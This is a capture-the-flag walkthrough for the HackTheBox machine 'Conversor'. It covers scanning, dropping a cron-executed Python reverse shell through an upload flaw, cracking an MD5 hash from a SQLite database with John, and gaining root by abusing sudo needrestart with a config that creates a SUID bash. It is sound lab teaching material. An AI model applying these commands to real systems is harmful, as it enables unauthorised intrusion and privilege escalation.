Conversor - Easy Linux

HackTheBox Conversor Walkthrough

OVERVIEW

Conversor is a Linux machine running an Apache web server hosting a file conversion web application. The attack chain involves uploading a malicious Python reverse shell via an XSLT injection vulnerability, cracking credentials found in a local SQLite database, and escalating privileges via a known needrestart exploit.

STEP 1 RECONNAISSANCE

Starting with an nmap scan:

sudo nmap -sC -sV 10.129.28.198

Two ports are open: SSH on 22 and HTTP on 80. The HTTP service immediately redirects to conversor.htb, so the first thing to do is add that to /etc/hosts:

echo "10.129.28.198 conversor.htb" | sudo tee -a /etc/hosts

STEP 2 WEB APPLICATION ENUMERATION

Navigating to http://conversor.htb shows a file conversion web app. Registration is open, so create an account and log in.

Digging into the page source reveals two critical things. First, there is no input validation on uploaded files. Second, an install.md file referenced in the source discloses that the server runs a cron job every minute that executes any Python scripts placed in /var/www/conversor.htb/scripts/. That is our path to remote code execution.

STEP 3 INITIAL ACCESS

The application processes XSLT files. XSLT injection via the EXSLT extension can theoretically be used to write arbitrary files to the filesystem (see PayloadsAllTheThings for reference). In practice, attempting this returned nginx errors, so the cleaner approach was to use Caido to intercept the file upload request and manually set the destination path to /var/www/conversor.htb/scripts/shell.py.

The uploaded file is a standard Python reverse shell pointing back to your attack machine. Set up a listener with Penelope before the cron fires:

penelope -p 4444

Wait up to one minute. The cron job picks up the script and executes it, landing a shell as www-data.

STEP 4 CREDENTIAL EXTRACTION

Enumerating the filesystem as www-data turns up a file called user.db. It is a SQLite3 database containing a user table with an MD5 hash for an account named fismathack.

Copy the hash to your machine and crack it with John:

./john --format=raw-md5 --wordlist=/path/to/rockyou.txt hash.txt

John cracks it in under two seconds:

Keepmesafeandwarm (fismathack)

STEP 5 LATERAL MOVEMENT

Switch to fismathack with the cracked password:

su fismathack

Grab the user flag from the home directory.

STEP 6 PRIVILEGE ESCALATION

Checking sudo privileges:

sudo -l

Output shows fismathack can run /usr/sbin/needrestart as root with no password. needrestart has a known privesc documented on GTFOBins — it accepts a custom config file via the -c flag which can be abused to run arbitrary commands as root.

Create the malicious config:

echo 'system("cp /bin/bash /tmp/poc; chmod u+s /tmp/poc")' > /tmp/cmd.conf

Run it:

sudo /usr/sbin/needrestart -c /tmp/cmd.conf

This drops a SUID copy of bash in /tmp. Execute it:

/tmp/poc -p

Root. Grab the flag from /root/root.txt.

ATTACK CHAIN SUMMARY

Nmap reveals conversor.htb → web app has no upload validation and a cron job watches a scripts directory → intercept upload with Caido to drop a Python reverse shell → cron executes it → www-data shell → SQLite DB contains MD5 hash → John cracks it → su to fismathack → sudo needrestart -c abuse → SUID bash → root.